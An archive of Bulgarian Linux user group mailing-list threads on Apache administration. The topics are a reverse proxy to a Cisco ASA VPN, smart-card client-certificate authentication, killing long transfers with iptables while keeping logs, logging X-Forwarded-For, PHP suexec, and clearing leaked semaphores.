[Lug-bg] Apache reverse proxy with POST
Здравейте, имам следната ситуация: host1: Apache reverse proxy via SSL to host2 host2: Cisco ASA clientless VPN Нормално Циско АСА се отваря по https, име/парола, получавам списък с линкове от вътрешната мрежа и достъпвам вътрешни ресурси В момента тествам отваряне на АСА през въпросното прокси и първоначалната страница се зарежда, но след въвеждане на име/парола и голямо мислене, излиза следното: The proxy server received an invalid response from an upstream server. The proxy server could not handle the request POST /+webvpn+/index.html. В логовете на апач излиза: The timeout specified has expired: proxy: error reading status line from remote server Потърсих за такава грешка (apache reverse proxy POST), излизат доста оплаквания, но нищо конкретно като идеи. Някой може ли да даде насока? Ето прокси конфигурацията на apache: # SSLProxyEngine On ProxyPass / https://host.com/ retry=1 acquire=3000 timeout=600 Keepalive=On ProxyPassReverse / https://host.como/ ProxyBadHeader Ignore ProxyPreserveHost On ProxyVia On RequestHeader set X-Forwarded-Proto https SSLProxyEngine on SetEnv proxy-nokeepalive 1 ProxyRequests Off Proxy * Order deny,allow Allow from all /Proxy # Благодаря предварително, ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Apache Web Logon с Електрон ен Подпис
On 01/12/08 14:29, [EMAIL PROTECTED] wrote: On 01/11/08 17:50, Dean Stoeff wrote: Здравейте някой борил ли се е с Апача да подкара оторизация на потребителите със смарт карти ? И по точно с тези издавани от нашите удостоверители на електронни подписи. Ето настройките на сървъра. http://httpd.apache.org/docs/2.0/ssl/ssl_howto.html От тук нататък проблема е в клиентските бразуери. Да имат импортиран клиентския сертификат или достъп до четящото устройство. :) Жоро, знам как да си подкарам SSL на Апачето и как да си инсталирам картат а със сертификатите в браузъра, но явно нещо пропускам защото нещо не се получава. Ето какво пише в лога на Апача: Предполагам си направил нещо подобно: http://marc.info/?l=apache-modsslm=101717965611360w=2 [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1190): Certificate Verification: depth: 2, subject: /C=BG/O=InfoNotary PLC/DC=qsign-ca/CN=i-Notary Q Sign CA/OU=i-Notary Q Sign CA, issuer: /C=BG/O=InfoNotary PLC/DC=root-ca/CN=InfoNotary CSP Root/OU=InfoNotary CSP Root/[EMAIL PROTECTED] [Fri Jan 11 18:42:01 2008] [error] Certificate Verification: Error (20): unable to get local issuer certificate 2 X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT: unable to get issuer certificate the issuer certificate could not be found: this occurs if the issuer certificate of an untrusted certificate cannot be found. [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1770): OpenSSL: Write: SSLv3 read client certificate B [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1789): OpenSSL: Exit: error in SSLv3 read client certificate B [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1789): OpenSSL: Exit: error in SSLv3 read client certificate B [Fri Jan 11 18:42:01 2008] [info] [client 192.168.6.166] SSL library error 1 in handshake (server telecom.navbul.com:443) [Fri Jan 11 18:42:01 2008] [info] SSL Library Error: 336105650 error:140890B2:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned [Fri Jan 11 18:42:01 2008] [info] [client 192.168.6.166] Connection closed to child 0 with abortive shutdown (server telecom.navbul.com:443) Виждам че ползваш InfoNotary като CA. Вмъкнал ли си техния root сертификат сред trusted CA? Клиента има ли също техния сертификат (освен ключа си)? http://www.mail-archive.com/[EMAIL PROTECTED]/msg46409.html http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcertificatechainfile http://www.issociate.de/board/post/292386/verify_error:num=20:unable_to_get_local_issuer_certificate.html http://gagravarr.org/writing/openssl-certs/others.shtml -- Georgi Chorbadzhiyski http://georgi.unixsol.org/ ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Apache Web Logon с Електрон ен Подпис
On 01/11/08 17:50, Dean Stoeff wrote: Здравейте някой борил ли се е с Апача да подкара оторизация на потребителите със смарт карти ? И по точно с тези издавани от нашите удостоверители на електронни подписи. Ето настройките на сървъра. http://httpd.apache.org/docs/2.0/ssl/ssl_howto.html От тук нататък проблема е в клиентските бразуери. Да имат импортиран клиентския сертификат или достъп до четящото устройство. :) Жоро, знам как да си подкарам SSL на Апачето и как да си инсталирам картат а със сертификатите в браузъра, но явно нещо пропускам защото нещо не се получава. Ето какво пише в лога на Апача: [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1190): Certificate Verification: depth: 2, subject: /C=BG/O=InfoNotary PLC/DC=qsign-ca/CN=i-Notary Q Sign CA/OU=i-Notary Q Sign CA, issuer: /C=BG/O=InfoNotary PLC/DC=root-ca/CN=InfoNotary CSP Root/OU=InfoNotary CSP Root/[EMAIL PROTECTED] [Fri Jan 11 18:42:01 2008] [error] Certificate Verification: Error (20): unable to get local issuer certificate [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1770): OpenSSL: Write: SSLv3 read client certificate B [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1789): OpenSSL: Exit: error in SSLv3 read client certificate B [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1789): OpenSSL: Exit: error in SSLv3 read client certificate B [Fri Jan 11 18:42:01 2008] [info] [client 192.168.6.166] SSL library error 1 in handshake (server telecom.navbul.com:443) [Fri Jan 11 18:42:01 2008] [info] SSL Library Error: 336105650 error:140890B2:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned [Fri Jan 11 18:42:01 2008] [info] [client 192.168.6.166] Connection closed to child 0 with abortive shutdown (server telecom.navbul.com:443) ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Apache Web Logon с Електрон ен Подпис
Предполагам си направил нещо подобно: http://marc.info/?l=apache-modsslm=101717965611360w=2 Да нещо подобно съм ползвал, с изключение на клиентския сертификат. Виждам че ползваш InfoNotary като CA. Вмъкнал ли си техния root сертификат сред trusted CA? Клиента има ли също техния сертификат (освен ключа си)? Сега тук не съм много сигурен, че на сървъра има цялата им верига, понеже на сайта им намерих само 4 сертификата, а преди време като си инсталирах веригата в браузера бяха 14. По точно съм сложил тези: crc.crt cqs-ca.crt in-csp-root.crt pqs-ca.crt qs-ca.crt Прикачвам и ssl конфигурационния ми файл ssl.conf Description: Binary data ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Apache Web Logon с Електр онен Подпис
Лека корекция ... за да верифицираме клиента трябва да стигнем до ноговото RootCA а не до нашето което ни е издало сертификата на сървъра. Тоест необходима ни е една от тези две директиви: SSLCACertificateFile SSLCACertificatePath Лично аз предпочитам втората (не знам какъв и е овърхеда в кода на апача). За справка: http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcacertificatefile On 12/01/2008, Georgi Chorbadzhiyski [EMAIL PROTECTED] wrote: On 01/12/08 14:29, [EMAIL PROTECTED] wrote: On 01/11/08 17:50, Dean Stoeff wrote: Здравейте някой борил ли се е с Апача да подкара оторизация на потребителите със смарт карти ? И по точно с тези издавани от нашите удостоверители на електронни подписи. Ето настройките на сървъра. http://httpd.apache.org/docs/2.0/ssl/ssl_howto.html От тук нататък проблема е в клиентските бразуери. Да имат импортиран клиентския сертификат или достъп до четящото устройство. :) Жоро, знам как да си подкарам SSL на Апачето и как да си инсталирам картат а със сертификатите в браузъра, но явно нещо пропускам защото нещо не се получава. Ето какво пише в лога на Апача: Предполагам си направил нещо подобно: http://marc.info/?l=apache-modsslm=101717965611360w=2 [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1190): Certificate Verification: depth: 2, subject: /C=BG/O=InfoNotary PLC/DC=qsign-ca/CN=i-Notary Q Sign CA/OU=i-Notary Q Sign CA, issuer: /C=BG/O=InfoNotary PLC/DC=root-ca/CN=InfoNotary CSP Root/OU=InfoNotary CSP Root/[EMAIL PROTECTED] [Fri Jan 11 18:42:01 2008] [error] Certificate Verification: Error (20): unable to get local issuer certificate 2 X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT: unable to get issuer certificate the issuer certificate could not be found: this occurs if the issuer certificate of an untrusted certificate cannot be found. [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1770): OpenSSL: Write: SSLv3 read client certificate B [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1789): OpenSSL: Exit: error in SSLv3 read client certificate B [Fri Jan 11 18:42:01 2008] [debug] ssl_engine_kernel.c(1789): OpenSSL: Exit: error in SSLv3 read client certificate B [Fri Jan 11 18:42:01 2008] [info] [client 192.168.6.166] SSL library error 1 in handshake (server telecom.navbul.com:443) [Fri Jan 11 18:42:01 2008] [info] SSL Library Error: 336105650 error:140890B2:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned [Fri Jan 11 18:42:01 2008] [info] [client 192.168.6.166] Connection closed to child 0 with abortive shutdown (server telecom.navbul.com:443) Виждам че ползваш InfoNotary като CA. Вмъкнал ли си техния root сертификат сред trusted CA? Клиента има ли също техния сертификат (освен ключа си)? http://www.mail-archive.com/[EMAIL PROTECTED]/msg46409.html http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcertificatechainfile http://www.issociate.de/board/post/292386/verify_error:num=20:unable_to_get_local_issuer_certificate.html http://gagravarr.org/writing/openssl-certs/others.shtml -- Georgi Chorbadzhiyski http://georgi.unixsol.org/ ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg -- С уважение, Владимир Витков http://www.netsecad.com http://www.supportbg.com ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Apache Web Logon с Електрон ен Подпис
Vladimir Vitkov wrote: хммм имаш си го странно, пробвал ли си да увеличиш дълбочината на удостоверяването (примерно на 3,4) Да, пробвал съм със 0,1,2,3,4,5 и 10 ефекта е един и същи, а интереното е че все пак клиенския сертификат се испраща от браузера обаче или тези сертификати на Инфонотари са нещо фалшиви или незнам ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Apache Web Logon с Електр онен Подпис
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dean Stoeff написа: | Да, пробвал съм със 0,1,2,3,4,5 и 10 ефекта е един и същи, а интереното | е че все пак клиенския сертификат се испраща от браузера обаче или тези | сертификати на Инфонотари са нещо фалшиви или незнам Здравей, Не съм сигурен дали има връзка но сертификатите на Инфонотари са с public key 4096 bit-а, поради което съм имал доста проблеми с тях. Например поради тази причина не се импортват в Oracle Wallet Manager-а без бой. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHiOHQzyQoZg3P9N4RAgGEAJ9SYj74RD1EwGf4ccz1dVAbbkbyrgCfXhq4 GA+j/fFxIh33IkDSRMQ3YnQ= =ANdn -END PGP SIGNATURE- ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
[Lug-bg] Apache Web Logon с Електрон ен Подпис
Здравейте някой борил ли се е с Апача да подкара оторизация на потребителите със смарт карти ? И по точно с тези издавани от нашите удостоверители на електронни подписи. ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: [Lug-bg] Apache Web Logon с Електрон ен Подпис
On 01/11/08 17:50, Dean Stoeff wrote: Здравейте някой борил ли се е с Апача да подкара оторизация на потребителите със смарт карти ? И по точно с тези издавани от нашите удостоверители на електронни подписи. Ето настройките на сървъра. http://httpd.apache.org/docs/2.0/ssl/ssl_howto.html От тук нататък проблема е в клиентските бразуери. Да имат импортиран клиентския сертификат или достъп до четящото устройство. -- Georgi Chorbadzhiyski http://georgi.unixsol.org/ ___ Lug-bg mailing list Lug-bg@linux-bulgaria.org http://linux-bulgaria.org/mailman/listinfo/lug-bg
Re: lug-bg: Apache спиране на трансфер + лог
Stoyan Tzalev wrote: Georgi Chorbadzhiyski написа: Именно. Не ми върши работа защото аз искам да прекъсна трансфера, а не да го чакам да си спре когато клиента пожелае. Не ме бийте за следната грозотия, която работи /по-лесно ми беше да я направя нея вместо да се кривя да компилирам tcpkill ot dsniff/. Скрипт ugly_tcpkill.sh пуска се ugly_tcpkill.sh PID_OF_HTTPD_PROCESS IP_OF_CLIENT #!/bin/sh lsof -n -i [EMAIL PROTECTED] | grep $1 | tr -s ' ' | cut -d -f8 | cut -d -f2 | tr : | while read IP PORT do iptables -I OUTPUT -p tcp -d $IP --dport $PORT -j REJECT --reject-with tcp-reset sleep 2 iptables -D OUTPUT -p tcp -d $IP --dport $PORT -j REJECT --reject-with tcp-reset done Не го използвайте в този вид моля, защото не отговарям за грешките, които са очевадни. :-) Привет, хвърли едно око тука, ако случайно вече не си го направил: http://www.lowth.com/cutter/ Няма външни зависимости като dsniff, а и би следвало да работи по-чисто. Изглежда полезно, благодаря. -- Georgi Chorbadzhiyski http://georgi.unixsol.org/
Re: lug-bg: Apache спиране на трансфер + лог
Georgi Chorbadzhiyski wrote: Питах вече в httpd-devel и -users ама никой не може да ми отговори, та реших, че може би някой из lug-а е по-светнат. Zdravei, pitai vav freebsd(US) listovete. Lichnia mi opit pokazva che v tia listove ima dosta znaeshti hora. Peter
Re: lug-bg: Apache спиране на трансфер + лог
Peter wrote: Georgi Chorbadzhiyski wrote: Питах вече в httpd-devel и -users ама никой не може да ми отговори, та реших, че може би някой из lug-а е по-светнат. pitai vav freebsd(US) listovete. Lichnia mi opit pokazva che v tia listove ima dosta znaeshti hora. То че има - има, ама едва ли е On-TOPIC подобно питане там. -- Georgi Chorbadzhiyski http://georgi.unixsol.org/
Re: lug-bg: Apache спиране на трансфер + лог
Georgi Chorbadzhiyski wrote: Питах вече в httpd-devel и -users ама никой не може да ми отговори, та реших, че може би някой из lug-а е по-светнат. Проблема ми е следният: когато apache трансферира големи файлове и по някаква причина реша, че искам да прекратя трансфера, какъвто и сигнал да пращам на httpd-то, което сервира, то или игнорира сигнала или просто умира, прекратявайки трансфера без да записва нищо в логовете. В мануала на апачето пише следното: * *graceful restart sigusr1 signal* zfile kill -s sigusr1 /apache_parent_pid/ or zfile kill -s sigusr1 `cat /usr/local/apache/logs/httpd.pid` The Apache parent asks its children to exit when they're finished with any requests they're currently handling. Then the existing parent re-reads the configuration file(s) and creates new children to replace the exiting ones. Graceful restart can be used to pick up new configuration files without disrupting traffic. * http://httpd.apache.org/docs/1.3/stopping.html Но май няма да ти свърши работа, защото така може да си го чакаш до утре спре
Re: lug-bg: Apache спиране на трансфер + лог
Alexander N. wrote: Georgi Chorbadzhiyski wrote: Питах вече в httpd-devel и -users ама никой не може да ми отговори, та реших, че може би някой из lug-а е по-светнат. Проблема ми е следният: когато apache трансферира големи файлове и по някаква причина реша, че искам да прекратя трансфера, какъвто и сигнал да пращам на httpd-то, което сервира, то или игнорира сигнала или просто умира, прекратявайки трансфера без да записва нищо в логовете. В мануала на апачето пише следното: * *graceful restart sigusr1 signal* zfile kill -s sigusr1 /apache_parent_pid/ or zfile kill -s sigusr1 `cat /usr/local/apache/logs/httpd.pid` The Apache parent asks its children to exit when they're finished with any requests they're currently handling. Then the existing parent re-reads the configuration file(s) and creates new children to replace the exiting ones. Graceful restart can be used to pick up new configuration files without disrupting traffic. * http://httpd.apache.org/docs/1.3/stopping.html Но май няма да ти свърши работа, защото така може да си го чакаш до утре спре Именно. Не ми върши работа защото аз искам да прекъсна трансфера, а не да го чакам да си спре когато клиента пожелае. Не ме бийте за следната грозотия, която работи /по-лесно ми беше да я направя нея вместо да се кривя да компилирам tcpkill ot dsniff/. Скрипт ugly_tcpkill.sh пуска се ugly_tcpkill.sh PID_OF_HTTPD_PROCESS IP_OF_CLIENT #!/bin/sh lsof -n -i [EMAIL PROTECTED] | grep $1 | tr -s ' ' | cut -d -f8 | cut -d -f2 | tr : | while read IP PORT do iptables -I OUTPUT -p tcp -d $IP --dport $PORT -j REJECT --reject-with tcp-reset sleep 2 iptables -D OUTPUT -p tcp -d $IP --dport $PORT -j REJECT --reject-with tcp-reset done Не го използвайте в този вид моля, защото не отговарям за грешките, които са очевадни. :-) -- Georgi Chorbadzhiyski http://georgi.unixsol.org/
Re: lug-bg: Apache спиране на трансфер + лог
Georgi Chorbadzhiyski wrote: Alexander N. wrote: Georgi Chorbadzhiyski wrote: Питах вече в httpd-devel и -users ама никой не може да ми отговори, та реших, че може би някой из lug-а е по-светнат. Проблема ми е следният: когато apache трансферира големи файлове и по някаква причина реша, че искам да прекратя трансфера, какъвто и сигнал да пращам на httpd-то, което сервира, то или игнорира сигнала или просто умира, прекратявайки трансфера без да записва нищо в логовете. В мануала на апачето пише следното: * *graceful restart sigusr1 signal* zfile kill -s sigusr1 /apache_parent_pid/ or zfile kill -s sigusr1 `cat /usr/local/apache/logs/httpd.pid` The Apache parent asks its children to exit when they're finished with any requests they're currently handling. Then the existing parent re-reads the configuration file(s) and creates new children to replace the exiting ones. Graceful restart can be used to pick up new configuration files without disrupting traffic. * http://httpd.apache.org/docs/1.3/stopping.html Но май няма да ти свърши работа, защото така може да си го чакаш до утре спре Именно. Не ми върши работа защото аз искам да прекъсна трансфера, а не да го чакам да си спре когато клиента пожелае. Не ме бийте за следната грозотия, която работи /по-лесно ми беше да я направя нея вместо да се кривя да компилирам tcpkill ot dsniff/. Скрипт ugly_tcpkill.sh пуска се ugly_tcpkill.sh PID_OF_HTTPD_PROCESS IP_OF_CLIENT #!/bin/sh lsof -n -i [EMAIL PROTECTED] | grep $1 | tr -s ' ' | cut -d -f8 | cut -d -f2 | tr : | while read IP PORT do iptables -I OUTPUT -p tcp -d $IP --dport $PORT -j REJECT --reject-with tcp-reset sleep 2 iptables -D OUTPUT -p tcp -d $IP --dport $PORT -j REJECT --reject-with tcp-reset done Не го използвайте в този вид моля, защото не отговарям за грешките, които са очевадни. :-) Аха, само като идея, няма ли да е по добре да се комбинират горните 2. Първо да кажеш на родителския процес да чака да привършат дъщерните процеси и после тях да утрепеш ?
Re: lug-bg: Apache спиране на трансфер + лог
Georgi Chorbadzhiyski написа: Въпроса ми е следният, някой знае ли начин да накарам Апаче да спре трансфер и да запише в лога заявката и байтовете, които са трансферирани? Какво става при пращане на HUP и веднага след това TERM? Поздрави, оги
Re: lug-bg: Apache спиране на трансфер + лог
Dean Stoeff wrote: Аха, само като идея, няма ли да е по добре да се комбинират горните 2. Първо да кажеш на родителския процес да чака да привършат дъщерните процеси и после тях да утрепеш ? Не, защото не искам да правя graceful на целият сървър само защото искам да спра определен трансфер. Няма никакъв смисъл, не ми помага с нищо. -- Georgi Chorbadzhiyski http://georgi.unixsol.org/
Re: lug-bg: Apache спиране на трансфер + лог
Огнян Кулев wrote: Georgi Chorbadzhiyski написа: Въпроса ми е следният, някой знае ли начин да накарам Апаче да спре трансфер и да запише в лога заявката и байтовете, които са трансферирани? Какво става при пращане на HUP и веднага след това TERM? Излиза без да пише в лога още при HUP. Вярвай ми опитах всички извратени сигнали, които kill -l ми казва че съществуват. Дори и SIGPWR и SIGXFSZ :) -- Georgi Chorbadzhiyski http://georgi.unixsol.org/
Re: lug-bg: Apache спиране на трансфер + лог
Georgi Chorbadzhiyski написа: Именно. Не ми върши работа защото аз искам да прекъсна трансфера, а не да го чакам да си спре когато клиента пожелае. Не ме бийте за следната грозотия, която работи /по-лесно ми беше да я направя нея вместо да се кривя да компилирам tcpkill ot dsniff/. Скрипт ugly_tcpkill.sh пуска се ugly_tcpkill.sh PID_OF_HTTPD_PROCESS IP_OF_CLIENT #!/bin/sh lsof -n -i [EMAIL PROTECTED] | grep $1 | tr -s ' ' | cut -d -f8 | cut -d -f2 | tr : | while read IP PORT do iptables -I OUTPUT -p tcp -d $IP --dport $PORT -j REJECT --reject-with tcp-reset sleep 2 iptables -D OUTPUT -p tcp -d $IP --dport $PORT -j REJECT --reject-with tcp-reset done Не го използвайте в този вид моля, защото не отговарям за грешките, които са очевадни. :-) Привет, хвърли едно око тука, ако случайно вече не си го направил: http://www.lowth.com/cutter/ Няма външни зависимости като dsniff, а и би следвало да работи по-чисто.
lug-bg: Apache спиране на тра нсфер + лог
Питах вече в httpd-devel и -users ама никой не може да ми отговори, та реших, че може би някой из lug-а е по-светнат. Проблема ми е следният: когато apache трансферира големи файлове и по някаква причина реша, че искам да прекратя трансфера, какъвто и сигнал да пращам на httpd-то, което сервира, то или игнорира сигнала или просто умира, прекратявайки трансфера без да записва нищо в логовете. Представете си някой (или 10 човека) си точат едно голямо ISO и по някое време решавате да спрете Апачито или да рестартирате машината. След което се оказва, че в логовете ви липсват отчетени десетина гигабайта трафик. Доста дразнещо. Въпроса ми е следният, някой знае ли начин да накарам Апаче да спре трансфер и да запише в лога заявката и байтовете, които са трансферирани? Единственият начин по който успях да го накарам да прави това е, като ползвах tcpkill, за да затворя конекцията, което както и да го погледнеш е отвратително грозен hack. -- Georgi Chorbadzhiyski http://georgi.unixsol.org/
Re: lug-bg: apache
Дамян Иванов wrote: Да, ако използваш mod_perl. За съжаление ако никога преди не си използвал mod_perl ще видиш бая зор - малко нанагорно е в началото ;\ Всъщност този сценарий прилича на писане на apache-модул, само дето въпросният модул се пише на perl, а не на Си. Ако проявяваш интерес мога да измисля нещо. Мерси, Аз погледнах Writing Apache Modules with Perl and C . Обаче леко се стресирах :). Ако имаш идея как да стане най-елегатно ще съм ти много бладодарен. Поздрави, Петър
Re: lug-bg: apache
Peter wrote: Дамян Иванов wrote: Да, ако използваш mod_perl. За съжаление ако никога преди не си използвал mod_perl ще видиш бая зор - малко нанагорно е в началото ;\ Всъщност този сценарий прилича на писане на apache-модул, само дето въпросният модул се пише на perl, а не на Си. Ако проявяваш интерес мога да измисля нещо. Аз погледнах Writing Apache Modules with Perl and C . Обаче леко се стресирах :). Това имах предвид и аз :) Ако имаш идея как да стане най-елегатно ще съм ти много бладодарен. Довечера ще опитам да нахвърлям нещо. За коя версия на apache ти трябва? дам -- Damyan Ivanov Creditreform Bulgaria [EMAIL PROTECTED] http://www.creditreform.bg/ phone: +359(2)928-2611, 929-3993fax: +359(2)920-0994 mob. +359(88)856-6067 [EMAIL PROTECTED]/Gaim signature.asc Description: OpenPGP digital signature
Re: lug-bg: apache
Damyan Ivanov wrote: Peter wrote: Дамян Иванов wrote: Да, ако използваш mod_perl. За съжаление ако никога преди не си използвал mod_perl ще видиш бая зор - малко нанагорно е в началото ;\ Всъщност този сценарий прилича на писане на apache-модул, само дето въпросният модул се пише на perl, а не на Си. Ако проявяваш интерес мога да измисля нещо. Аз погледнах Writing Apache Modules with Perl and C . Обаче леко се стресирах :). Това имах предвид и аз :) Ако имаш идея как да стане най-елегатно ще съм ти много бладодарен. Довечера ще опитам да нахвърлям нещо. За коя версия на apache ти трябва? дам Apache 1.3 :-) мерси :-)) Петър
lug-bg: apache
Здравейте, Възможен ли е следният сценарий БЕЗ написване на собствен апаче модул. Вземам хедъра X_FORWARDED_FOR. При няколко проксита те са разганичени със запетаи. Вземам едно от тях и го сетвам като ENV променлива(например X-peter), която е достъпна и мога да си я пиша из логове и т.н Дайте съвет, Мерси предварително :-) Поздрави, Петър
Re: lug-bg: apache
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Peter wrote: Здравейте, Възможен ли е следният сценарий БЕЗ написване на собствен апаче модул. Вземам хедъра X_FORWARDED_FOR. При няколко проксита те са разганичени със запетаи. Вземам едно от тях и го сетвам като ENV променлива(например X-peter), която е достъпна и мога да си я пиша из логове и т.н Да, ако използваш mod_perl. За съжаление ако никога преди не си използвал mod_perl ще видиш бая зор - малко нанагорно е в началото ;\ Всъщност този сценарий прилича на писане на apache-модул, само дето въпросният модул се пише на perl, а не на Си. Ако проявяваш интерес мога да измисля нещо. дам - -- Дамян Иванов Кредитреформ България [EMAIL PROTECTED] http://www.creditreform.bg/ тел. +359(2)928-2611, 929-3993 факс +359(2)920-0994 моб. +359(88)856-6067 [EMAIL PROTECTED]/Gaim -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFD6Pf+Hqjlqpcl9jsRAoOgAJ9hGMNWeV1381HrzbpbWgu5nmg1qwCcDObq zlGPDkfb1ASr46vsgUQ1m9A= =kwyN -END PGP SIGNATURE-
lug-bg: Apache + php restriction policies
Изпростях тотално, след като потребители оставаха за по 2 минути без хостинг(по моя вина), се зачудих - имам си за всички cgi-та suexec. За mod_php обаче нямам друг restriction освен openbasedir. Това е много неудобно, защото процесите правят файлове с owner www-data , който е неизползваем в shell (не се пише по него). Казвайте сега, какъв според вас е най-удобния начин за suexec на php. Сами знаете каква е вредата от рънване на php , като cgi, да не говориме, че при мен сложни скриптове не успях да изкарам от apache( ? echo 1 ? минава :), но phpinfo() връща 500). има www.suphp.org ,но и той разчита на php-cgi . Засега на морна глава ми се струва най-добро решение php+fastcgi+mod_suexec като съотношение бързина/сигурност.
Re: lug-bg: apache ili ...?
Много Благодаря!. Точно там бе проблема където посочи Георги Чорбаджийски. O /dev/hda11 13260 60495 18% /boot none225584 0225584 0% /dev/shm ^^ /dev/hda8 49541932 6357072 40668280 14% /home Georgi Chorbadzhiyski http://georgi.unixsol.org/
Re: lug-bg: apache ili ...?
дай изхода от mount и df -i
Re: lug-bg: apache ili ...?
[EMAIL PROTECTED] wrote: Здравейте, Един апах 2.0.51 на една федора 2 се излага...:) Или може би не то? това е засега с което разполагам: [Tue Oct 04 23:32:13 2005] [crit] (28)No space left on device: mod_rewrite: could not create rewrite_log_lock Configuration Failed [Tue Oct 04 23:43:53 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [Tue Oct 04 23:43:53 2005] [notice] Digest: generating secret for digest authentication ... [Tue Oct 04 23:43:53 2005] [notice] Digest: done [Tue Oct 04 23:43:53 2005] [notice] mod_python: Creating 32 session mutexes based on 250 max processes and 0 max threads. [Tue Oct 04 23:43:53 2005] [error] (28)No space left on device: mod_python: Failed to create global mutex 0 of 32 (/tmp/mpmt$Configuration Failed [Tue Oct 04 23:47:18 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [Tue Oct 04 23:47:18 2005] [notice] Digest: generating secret for digest authentication ... [Tue Oct 04 23:47:18 2005] [notice] Digest: done [Tue Oct 04 23:47:18 2005] [emerg] (28)No space left on device: Couldn't create accept lock местенце си има: Filesystem 1K-blocks Used Available Use% Mounted on /dev/hda5 8064304321340 708 5% / /dev/hda11 13260 60495 18% /boot none225584 0225584 0% /dev/shm ^^ /dev/hda8 49541932 6357072 40668280 14% /home /dev/hda7 1035692 32832950248 4% /tmp /dev/hda3 8064304 1712932 5941716 23% /usr /dev/hda2 8064304 2106988 5547660 28% /var -- Georgi Chorbadzhiyski http://georgi.unixsol.org/
Re: lug-bg: apache ili ...?
i na men mi pravi (makar i riadko) sushtia problem na Fedora Core 3. Pri restart ponqkoga prosto otkazva da zapali s tazi greshka. Opitai s tazi komanda: ipcs -s | grep apache | perl -e 'while (STDIN) { @a=split(/\s+/); print `ipcrm sem $a[1]`}' - Original Message - From: [EMAIL PROTECTED] To: lug-bg@linux-bulgaria.org Sent: Wednesday, October 05, 2005 9:48 AM Subject: lug-bg: apache ili ...? Здравейте, Един апах 2.0.51 на една федора 2 се излага...:) това е засега с което разполагам: [Tue Oct 04 23:32:13 2005] [crit] (28)No space left on device: mod_rewrite: could not create rewrite_log_lock Configuration Failed [Tue Oct 04 23:43:53 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [Tue Oct 04 23:43:53 2005] [notice] Digest: generating secret for digest authentication ... [Tue Oct 04 23:43:53 2005] [notice] Digest: done [Tue Oct 04 23:43:53 2005] [notice] mod_python: Creating 32 session mutexes based on 250 max processes and 0 max threads. [Tue Oct 04 23:43:53 2005] [error] (28)No space left on device: mod_python: Failed to create global mutex 0 of 32 (/tmp/mpmt$Configuration Failed [Tue Oct 04 23:47:18 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [Tue Oct 04 23:47:18 2005] [notice] Digest: generating secret for digest authentication ... [Tue Oct 04 23:47:18 2005] [notice] Digest: done [Tue Oct 04 23:47:18 2005] [emerg] (28)No space left on device: Couldn't create accept lock местенце си има: Filesystem 1K-blocks Used Available Use% Mounted on /dev/hda5 8064304321340 708 5% / /dev/hda11 13260 60495 18% /boot none225584 0225584 0% /dev/shm /dev/hda8 49541932 6357072 40668280 14% /home /dev/hda7 1035692 32832950248 4% /tmp /dev/hda3 8064304 1712932 5941716 23% /usr /dev/hda2 8064304 2106988 5547660 28% /var
Re: lug-bg: apache ili ...?
